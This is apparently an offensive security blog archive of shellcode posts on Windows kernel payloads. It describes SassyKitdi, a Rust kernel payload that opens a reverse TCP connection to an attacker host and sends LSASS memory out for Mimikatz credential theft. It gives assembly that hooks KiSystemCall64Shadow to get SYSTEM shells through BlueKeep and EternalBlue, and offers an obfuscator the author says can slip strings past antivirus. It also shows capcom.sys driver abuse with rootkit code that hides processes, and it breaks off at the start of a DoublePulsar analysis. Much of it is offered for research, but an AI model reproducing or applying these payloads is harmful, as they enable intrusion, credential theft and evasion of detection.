zerosum0x0: shellcode

Showing posts with label shellcode. Show all posts

Saturday, August 15, 2020

SassyKitdi: Kernel Mode TCP Sockets + LSASS Dump

Introduction
Transport Driver Interface
Dumping LSASS from Kernel Mode
Shellcoding in Rust
- Compiler Optimizations
- Using High-Level Constructs
Conclusion

Introduction

This post describes a kernel mode payload for Windows NT called "SassyKitdi" (LSASS + Rootkit + TDI). This payload is of a nature that can be deployed via remote kernel exploits such as EternalBlue, BlueKeep, and SMBGhost, as well as from local kernel exploits, i.e. bad drivers. This exploit payload is universal from (at least) Windows 2000 to Windows 10, and without having to carry around weird DKOM offsets.

The payload has 0 interaction with user-mode, and creates a reverse TCP socket using the Transport Driver Interface (TDI), a precursor to the more modern Winsock Kernel (WSK). The LSASS.exe process memory and modules are then sent over the wire where they can be transformed into a minidump file on the attacker's end and passed into a tool such as Mimikatz to extract credentials.

tl;dr: PoC || GTFO GitHub

The position-independent shellcode is ~3300 bytes and written entirely in the Rust programming language, using many of its high level abstractions. I will outline some of the benefits of Rust for all future shellcoding needs, and precautions that need to be taken.

Figure 0: An oversimplification of the SassyKitdi methodology.

I don't have every AV on hand to test against obviously, but given that most AV misses obvious user-mode stuff thrown at it, I can only assume there is currently almost universal ineffectiveness of antivirus available being able to detect the methodology.

Finally, I will discuss what a future kernel mode rootkits could look like, if one took this example a couple steps further. What's old is new again.

Transport Driver Interface

TDI is an old school method to talk to all types of network transports. In this case it will be used to create a reverse TCP connection back to the attacker. Other payloads such as Bind Sockets, as well as UDP, would follow a similar methodology.

The use of TDI in rootkits is not exactly widespread, but it has been documented in the following books which served as references for this code:

Vieler, R. (2007). Professional Rootkits. Indianapolis, IN: Wiley Technology Pub.
Hoglund, G., & Butler, J. (2009). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ: Addison-Wesley.

Opening the TCP Device Object

TDI device objects are found by their device name, in our case \Device\Tcp. Essentially, you use the ZwCreateFile() kernel API with the device name, and pass options in through the use of our old friend File Extended Attributes.

pub type ZwCreateFile = extern "stdcall" fn(
    FileHandle:         PHANDLE,
    AccessMask:         ACCESS_MASK,
    ObjectAttributes:   POBJECT_ATTRIBUTES,
    IoStatusBlock:      PIO_STATUS_BLOCK,
    AllocationSize:     PLARGE_INTEGER,
    FileAttributes:     ULONG,
    ShareAccess:        ULONG,
    CreateDisposition:  ULONG,
    CreateOptions:      ULONG,
    EaBuffer:           PVOID,
    EaLength:           ULONG,
) -> NTSTATUS;

The device name is passed in the ObjectAttributes field, and the configuration is passed in the EaBuffer. We must create a Transport handle (FEA: TransportAddress) and a Connection handle (FEA: ConnectionContext).

The TransportAddress FEA takes a TRANSPORT_ADDRESS structure, which for IPv4 consists of a few other structures. It is at this point that we can choose which interface to bind to, or which port to use. In our case, we will choose 0.0.0.0 with port 0, and the kernel will bind us to the main interface with a random ephemeral port.

#[repr(C, packed)]
pub struct TDI_ADDRESS_IP {
    pub sin_port:   USHORT,
    pub in_addr:    ULONG,
    pub sin_zero:   [UCHAR; 8],
}

#[repr(C, packed)]
pub struct TA_ADDRESS {
    pub AddressLength:  USHORT,
    pub AddressType:    USHORT,
    pub Address:        TDI_ADDRESS_IP,
}

#[repr(C, packed)]
pub struct TRANSPORT_ADDRESS {
    pub TAAddressCount:     LONG,
    pub Address:            [TA_ADDRESS; 1],
}

The ConnectionContext FEA allows setting of an arbitrary context instead of a defined struct. In the example code we just set this to NULL and move on.

At this point we have created the Transport Handle, Transport File Object, Connection Handle, and Connection File Object.

Connecting to an Endpoint

After initial setup, the rest of TDI API is performed through IOCTLs to the device object associated with our File Objects.

TDI uses IRP_MJ_INTERNAL_DEVICE_CONTROL with various minor codes. The ones we are interested in are:

#[repr(u8)]
pub enum TDI_INTERNAL_IOCTL_MINOR_CODES {
    TDI_ASSOCIATE_ADDRESS     = 0x1,
    TDI_CONNECT               = 0x3,
    TDI_SEND                  = 0x7,
    TDI_SET_EVENT_HANDLER     = 0xb,
}

Each of these internal IOCTLs has various structures associated with them. The basic methodology is to:

Get the Device Object from the File Object using IoGetRelatedDeviceObject()
Create the internal IOCTL IRP using IoBuildDeviceIoControlRequest()
Set the opcode inside IO_STACK_LOCATION.MinorFunction
Copy the op's struct pointer to the IO_STACK_LOCATION.Parameters
Dispatch the IRP with IofCallDriver()
Wait for the operation to complete using KeWaitForSingleObject() (optional)

For the TDI_CONNECT operation, the IRP parameters includes a TRANSPORT_ADDRESS structure (defined in the previous section). This time, instead of setting it to 0.0.0.0 port 0, we set it to the values of where we want to connect (and, in big endian).

Sending Data Over the Wire

If the connection IRP succeeds in establishing a TCP connection, we can then send TDI_SEND IRPs to the TCP device.

The TDI driver expects a Memory Descriptor List (MDL) that describes the buffer to send over the network.

Assuming we want to send some arbitrary data over the wire, we must perform the following steps:

ExAllocatePool() a buffer and RtlCopyMemory() the data over (optional)
IoAllocateMdl() providing the buffer address and size
MmProbeAndLockPages() to page-in during the send operation
Dispatch the Send IRP
The I/O manager will unlock the pages and free the MDL
ExFreePool() the buffer (optional)

In this case the MDL is attached to the IRP. The Parameters structure we can just set SendFlags to 0 and SendLength to the data size.

#[repr(C, packed)]
pub struct TDI_REQUEST_KERNEL_SEND {
    pub SendLength:    ULONG,
    pub SendFlags:     ULONG,
}

Dumping LSASS from Kernel Mode

LSASS is of course the goldmine on Windows, where prizes such as cleartext credentials and kerberos information can be obtained. Many AV vendors are getting better at hardening LSASS when attempting to dump from user-mode. But we'll do it from the privilege of the kernel.

Mimikatz requires 3 streams to process a minidump: System Information, Memory Ranges, and Module List.

Obtaining Operating System Information

Mimikatz really only needs to know the Major, Minor, and Build versions of NT. This can be obtained with the NTOSKRNL exported function RtlGetVersion() that provides the following struct:

#[repr(C)]
pub struct RTL_OSVERSIONINFOW {
    pub dwOSVersionInfoSize:        ULONG,
    pub dwMajorVersion:             ULONG,
    pub dwMinorVersion:             ULONG,
    pub dwBuildNumber:              ULONG,
    pub dwPlatformId:               ULONG,
    pub szCSDVersion:               [UINT16; 128],    
}

Scraping All Memory Regions

Of course, the most important part of an LSASS dump is the actual memory of the LSASS process. Using KeStackAttachProcess() allows one to read the virtual memory of LSASS. From there it is possible to iterate over memory ranges with ZwQueryVirtualMemory().

pub type ZwQueryVirtualMemory = extern "stdcall" fn(
    ProcessHandle:              HANDLE,
    BaseAddress:                PVOID,
    MemoryInformationClass:     MEMORY_INFORMATION_CLASS,
    MemoryInformation:          PVOID,
    MemoryInformationLength:    SIZE_T,
    ReturnLength:               PSIZE_T,
) -> crate::types::NTSTATUS;

Pass in -1 for the ProcessHandle, 0 for the initial BaseAddress, and use the MemoryBasicInformation class to receive the following struct:

#[repr(C)]
pub struct MEMORY_BASIC_INFORMATION {
    pub BaseAddress:            PVOID,
    pub AllocationBase:         PVOID,
    pub AllocationProtect:      ULONG,
    pub PartitionId:            USHORT,
    pub RegionSize:             SIZE_T,
    pub State:                  ULONG,
    pub Protect:                ULONG,
    pub Type:                   ULONG,
}

For the next iteration of ZwQueryVirtualMemory(), just set the next BaseAddress to BaseAddress+RegionSize. Keep iterating until ReturnLength is 0 or there is an NT error.

Collecting List of Loaded Modules

Mimikatz also requires to know where a few of the DLLs are located in memory in order to scrape some secrets out of them during processing.

The most convenient way to iterate these is to grab the DLL list out of the PEB. The PEB can be found using ZwQueryInformationProcess() with the ProcessBasicInformation class.

Mimikatz requires the DLL name, address, and size. These are easily scraped out of PEB->Ldr.InLoadOrderLinks, which is a well-documented methodology to obtain the linked list of LDR_DATA_TABLE_ENTRY entries.

#[cfg(target_arch="x86_64")]
#[repr(C, packed)]
pub struct LDR_DATA_TABLE_ENTRY {
    pub InLoadOrderLinks:               LIST_ENTRY,
    pub InMemoryOrderLinks:             LIST_ENTRY,
    pub InInitializationOrderLinks:     LIST_ENTRY,
    pub DllBase:                        PVOID,
    pub EntryPoint:                     PVOID,
    pub SizeOfImage:                    ULONG,
    pub Padding_0x44_0x48:              [BYTE; 4],
    pub FullDllName:                    UNICODE_STRING,
    pub BaseDllName:                    UNICODE_STRING,
    /* ...etc... */
}

Just iterate the linked list til you wind back at the beginning, grabbing FullDllName, DllBase, and SizeOfImage of each DLL for the dump file.

Notes on Shellcoding in Rust

Rust is one of the more modern languages trending these days. It does not require a run-time and can be used to write extremely low-level embedded code that interacts with C FFI. To my knowledge there are only a few things that C/C++ can do that Rust cannot: C variadic functions (coming soon) and SEH (outside of internal panic operations?).

It is simple enough to cross-compile Rust from Linux using the mingw-w64 linker, and use Rustup to add the x86_64-windows-pc-gnu target. I create a DLL project and extract the code between _DllMainCRTStartup() and malloc(). Not very stable perhaps, but I could only figure out how to generate PE files and not something such as a COM file.

Here's an example of how nice shellcoding in Rust can be:

let mut socket = nttdi::TdiSocket::new(tdi_ctx);

socket.add_recv_handler(recv_handler);
socket.connect(0xdd01a8c0, 0xBCFB)?;  // 192.168.1.221:64444

socket.send("abc".as_bytes().as_ptr(), 3)?;

Compiler Optimizations

Rust sits atop LLVM, an intermediate language before final code generation, and thus benefits from many of the optimizations that languages such as C++ (Clang) have received over the years.

I won't get too deep into the weeds, especially with zealots on all sides, but the highly static compilation nature of Rust often results in much smaller code size than C or C++. Code size is not necessarily an indicator of performance, but for shellcode it is important. You can do your own testing, but Rust's code generation is extremely good.

We can set the Cargo.toml file to use opt-level='z' (optimize for size) lto=true (link time optimize) to further reduce generated code size.

Using High-Level Constructs

The most obvious high-level benefit of using Rust is RAII. In Windows this means HANDLEs can be automatically closed, kernel pools automatically freed, etc. when our encapsulating objects go out of scope. Simple constructors and destructors such as these examples are aggressively inlined with our Rust compiler flags.

Rust has concepts such as "Result<Ok, Err>" return types, as well as the ? 'unwrap or throw' operator, which allows us to bubble up errors in a streamlined fashion. We can return tuples in the Ok slot, and NTSTATUS codes in the Err slot if something goes wrong. The code generation for this feature is minimal, often returning a double wide struct. The bookkeeping is basically equivalent to the amount of bytes it would take to do by hand, but simplifies the high level code considerably.

For shellcoding purposes, we cannot use the "std" library (to digress, well, we could add an allocator), and must use Rust "core" only. Further, many open-source crate libraries are off-limits due to causing the code to not be position independent. For this reason, a new crate called `ntdef` was created, which simply contains only definitions of types and 0 static-positioned information. Oh, and if you ever need stack-based wide-strings (perhaps something else missing from C), check out JennaMagius' stacklstr crate.

Due to the low-level nature of the code, its FFI interactions with the kernel, and having to carry around context pointers, most of the shellcode is "unsafe" Rust code.

Writing shellcode by hand is tedious and results in long debug sessions. The ability to write the assembly template in a high-level abstraction language like Rust saves enormous amounts of time in research and development. Handcrafted assembly will always result in smaller code size, but having a guide to go off of is of great benefit. After all, optimizing compilers are written by humans, and all edge cases are not taken into account.

Conclusion

SassyKitdi must be performed at PASSIVE_LEVEL. To use the sample project in an exploit payload, you will need to provide your own exploit preamble. This is the unique part of the exploit that cleans up the stack frame, and in e.g. EternalBlue lowers the IRQL from DISPATCH_LEVEL.

What is interesting to consider is turning the use of a TDI exploit payload into the staging for a kernel-mode Meterpreter like framework. It is very easy to tweak the provided code to instead download and execute a larger secondary kernel-mode payload. This can take the form of a reflectively-loaded driver. Such a framework would have easy access to tokens, files, and many other functionalities that are currently getting caught by AV in user-mode. This initial staging shellcode can be hand-shrunk to approximately 1000-1500 bytes.

Thursday, November 7, 2019

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

Background
Meltdown CPU Vulnerability
- KVA Shadow Mitigation
- KiSystemCall64Shadow Changes
Existing Remote Kernel Payloads
- Hooking IA32_LSTAR MSR
- Double Fault Root Cause Analysis
Hooking KiSystemCall64Shadow
Conclusion

Background

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode
— Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently breaks the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors are loading and evaluating and branching ("speculating") way before these operations are "actually" to be run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, exploitation of Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

Swap to kernel GS segment
Save user stack to KPCR->Prcb.UserRspShadow
Check if KPCR->Prcb.ShadowFlags first bit is set

Set CR3 to KPCR->Prcb.KernelDirectoryTableBase

Load kernel stack from KPCR->Prcb.RspBaseShadow

The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

Existing Remote Kernel Payloads

The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

Hooking IA32_LSTAR MSR

In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

Double Fault Root Cause Analysis

Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with a UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

We can see that at this point, user mode can see the KiSystemCall64Shadow function:

However, user mode cannot see our shellcode location:

The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

Hooking KiSystemCall64Shadow

So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

Heuristic Offset Detection

We want to accomplish two things:

Install our hook in a spot after kernel pages CR3 is loaded.
Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2-bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

The following shellcode is the 0th stage that runs after exploitation:

payload_start:
; read IA32_LSTAR
    mov ecx, 0xc0000082         
    rdmsr

    shl rdx, 0x20
    or rax, rdx                 
    push rax

; rsi = &KiSystemCall64Shadow
    pop rsi                      

; this loop stores the offset to push 2b into ecx
_find_push2b_start:
    xor ecx, ecx
    mov ebx, 0x652b6a00

_find_push2b_loop:
    inc ecx
    cmp ebx, dword [rsi + rcx - 1]
    jne _find_push2b_loop

This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.

The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

Atomic x64 Function Hooking

It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b function!

Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

; install hook call in KiSystemCall64Shadow NOP padding
install_big_jmp:

; 0x905748bf = nop; push rdi; movabs rdi &fake_syscall_hook;
    mov dword [rsi - 0x10], 0xbf485790 
    lea rdi, [rel fake_syscall_hook]
    mov qword [rsi - 0xc], rdi

; 0x57c3 = push rdi; ret;
    mov word [rsi - 0x4], 0xc357

; ... 

fake_syscall_hook:

; ...

Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

; install tiny jmp to the NOP padding jmp
install_small_jmp:

; rsi = &syscall+push2b
    add rsi, rcx

; eax = jmp -x
; fix -x to actual offset required
    mov eax, 0xfeeb
    shl ecx, 0x8
    sub eax, ecx
    sub eax, 0x1000

; push 2b => jmp -x;
    mov word [rsi], ax

And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

On the next system call: the kernel stack and page tables will be loaded, our small jmp hook will goto big jmp which will goto our fake syscall handler at PASSIVE_LEVEL.

Cleaning Up the Hook

Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

; this syscall hook is called AFTER kernel stack+KVA shadow is setup
fake_syscall_hook:

; save all volatile registers
    push rax
    push rbp
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11

    mov rbp, STAGE_SHARED_MEM

; use lock cmpxchg for queueing APC only one at a time
single_thread_gate:
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
    jnz _restore_syscall

; only 1 thread has this lock
; allow interrupts while executing ring0 to ring3
    sti
    call r0_to_r3
    cli

; all threads can clean up
_restore_syscall:

; calculate offset to 0x2b using shared storage
    mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
    mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
    add rdi, rax

; atomic change small jmp to push 2b
    mov word [rdi], 0x2b6a

All threads restore the push 2b, as the code flow results in less bytes, no extra locking, and shouldn't matter.

Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

_syscall_hook_done:

; restore register values
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

; rdi still holds push2b offset!
; but needs to be restored

; do not cause bugcheck 0xc4 arg1=0x91
    mov qword [rsp-0x20], rdi
    pop rdi

; return to &KiSystemCall64Shadow+push2b
    jmp [rsp-0x28]

You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

Conclusion

Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

It's simple, it's obvious, it's hacky; but it works and so it's what you want.

Thursday, August 17, 2017

Obfuscated String/Shellcode Generator - Online Tool

ADD SUB XOR SHIFT NOT NEG MORPH
String Shellcode | Rounds:

Shellcode will be cleaned of non-hex bytes using the following algorithm:

s = s.replace(/(0x|0X)/g, "");
s = s.replace(/[^A-Fa-f0-9]/g, "");

About this tool

I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation or I wouldn't have had to make this. I remember a website that used to do this similar thing for free but at some point it moved to a pay model. I think maybe it had a few extra features?

This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.

Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

Saturday, July 1, 2017

Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

Update July 3, 2017: FuzzySec has also previously written some info about this.

Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings , and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

But why waste 0-days when you can use kn0wn-days?

Premise

If you're running as an elevated admin, you're allowed to load (signed) drivers.
- Local users are almost always admins.
- UAC is known to be fundamentally broken.
Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
- It's a fairly obvious idea, and elementary to perform.
- Windows does not have robust certificate revocation.
  - Thus, the DSE trust model is fundamentally broken!

Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe
— slipstream/RoL (@TheWack0lian) September 23, 2016

Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

The unfortunate part is it can still be easily loaded and exploited to this day.

My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.
— Matt Graeber (@mattifestation) June 24, 2017

If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seems bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

Proof of Concept

Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

1: kd> dt !_EPROCESS ActiveProcessLinks
   +0x2e8 ActiveProcessLinks : _LIST_ENTRY

For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple, doing something interesting once there is more difficult (e.g. we can already load drivers, the usual SYSTEM shell can be obtained through less dangerous methods).

I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.

static void rootkit_unlink(PEPROCESS pProcess)
{
 static const DWORD WIN10_RS3_OFFSET = 0x2e8;

 PLIST_ENTRY plist = 
  (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);

 *((DWORD64*)plist->Blink) = (DWORD64)plist->Flink;
 *((DWORD64*)plist->Flink + 1) = (DWORD64)plist->Blink;

 plist->Flink = (PLIST_ENTRY) &(plist->Flink);
 plist->Blink = (PLIST_ENTRY) &(plist->Flink);
}

Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.

DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

Friday, April 21, 2017

DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis

One week ago today, the Shadow Brokers (an unknown hacking entity) leaked the Equation Group's (NSA) FuzzBunch software, an exploitation framework similar to Metasploit. In the framework were several unauthenticated, remote exploits for Windows (such as the exploits codenamed EternalBlue, EternalRomance, and EternalSynergy). Many of the vulnerabilities that are exploited were fixed in MS17-010, perhaps the most critical Windows patch in almost a decade.

Side note: You can use my MS17-010 Metasploit auxiliary module to scan your networks for systems missing this patch (uncredentialed and non-intrusive). If a missing patch is found, it will also check for an existing DoublePulsar infection.

Introduction

For those unfamiliar, DoublePulsar is the primary payload used in SMB and RDP exploits in FuzzBunch. Analysis was performed using the EternalBlue SMBv1/SMBv2 exploit against Windows Server 2008 R2 SP1 x64.

The shellcode, in tl;dr fashion, essentially performs the following:

Step 0: Shellcode sorcery to determine if x86 or x64, and branches as such.
Step 1: Locates the IDT from the KPCR, and traverses backwards from the first interrupt handler to find ntoskrnl.exe base address (DOS MZ header).
Step 2: Reads ntoskrnl.exe's exports directory, and uses hashes (similar to usermode shellcode) to find ExAllocPool/ExFreePool/ZwQuerySystemInformation functions.
Step 3: Invokes ZwQuerySystemInformation() with the enum value SystemQueryModuleInformation, which loads a list of all drivers. It uses this to locate Srv.sys, an SMB driver.
Step 4: Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.
Step 5: With secondary DoublePulsar payloads (such as inject DLL), the hook function sees if you "knock" correctly and allocates an executable buffer to run your raw shellcode. All other requests are forwarded directly to the original SrvTransactionNotImplemented() function. "Burning" DoublePulsar doesn't completely erase the hook function from memory, just makes it dormant.

After exploitation, you can see the missing symbol in the SrvTransaction2DispatchTable. There are supposed to be 2 handlers here with the SrvTransactionNotImplemented symbol. This is the DoublePulsar backdoor (array index 14):

Honestly, you don't usually wake up in the morning and feel like spending time dissecting ~3600 some odd bytes of Ring-0 shellcode, but I felt productive today. Also I was really curious about this payload and didn't see many details about it outside of Countercept's analysis of the DLL injection code. But I was interested in how the initial SMB backdoor is installed, which is what this post is about.

Zach Harding, Dylan Davis, and I kind of rushed through it in a few hours in our red team lab at RiskSense. There is some interesting setup in the EternalBlue exploit with the IA32_LSTAR syscall MSR (0xc000082) and a region of the Srv.sys containing FEFEs, but I will instead focus on just the raw DoublePulsar methodology... Much like the EXTRABACON shellcode, this one is crafty and does not simply spawn a shell.

Detailed Shellcode Analysis

Inside the Shadow Brokers dump you can find DoublePulsar.exe and EternalBlue.exe. When you use DoublePulsar in FuzzBunch, there is an option to spit its shellcode out to a file. We found out this is a red herring, and that the EternalBlue.exe contained its own payload.

Step 0: Determine CPU Architecture

